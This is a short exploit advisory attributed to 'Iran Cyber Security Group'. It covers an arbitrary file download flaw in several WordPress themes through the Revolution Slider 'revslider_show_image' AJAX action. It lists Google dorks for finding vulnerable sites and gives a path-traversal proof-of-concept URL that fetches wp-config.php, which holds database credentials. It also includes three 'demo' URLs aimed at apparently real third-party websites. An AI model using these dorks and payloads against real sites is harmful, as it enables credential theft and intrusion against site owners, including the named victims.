#############################################################
# Wordpress Theme Arbitrary File Download Vulnerability # #
# #
# Exploit Author: Iran Cyber Security Group # #
#############################################################
#
#
# Exploit Title: Wordpress Theme Arbitrary File Download Vulnerability
#
# Date: 25/03/2015
#
# Exploit Author: Iran Cyber Security Group
#
# Contact : Iran-Cyber.Org - icg_Sec@yahoo.com|
#
# Tested on: Linux / Window
#
#
# Google Dork:
#
# inurl:wp-content/themes/bretheon/
# inurl:"wp-content/themes/u-design/
# inurl:"wp-content/themes/terra/
# inurl:"wp-content/themes/pindol/
#
###########################################
#
#
# PoC
#
# http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
#
#
#
#
# Demo :
#
# http://www.rentaltableXts.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# http://www.spi-enginXeering.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# http://www.vidyasaXgar.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
#
#
#
#############################################################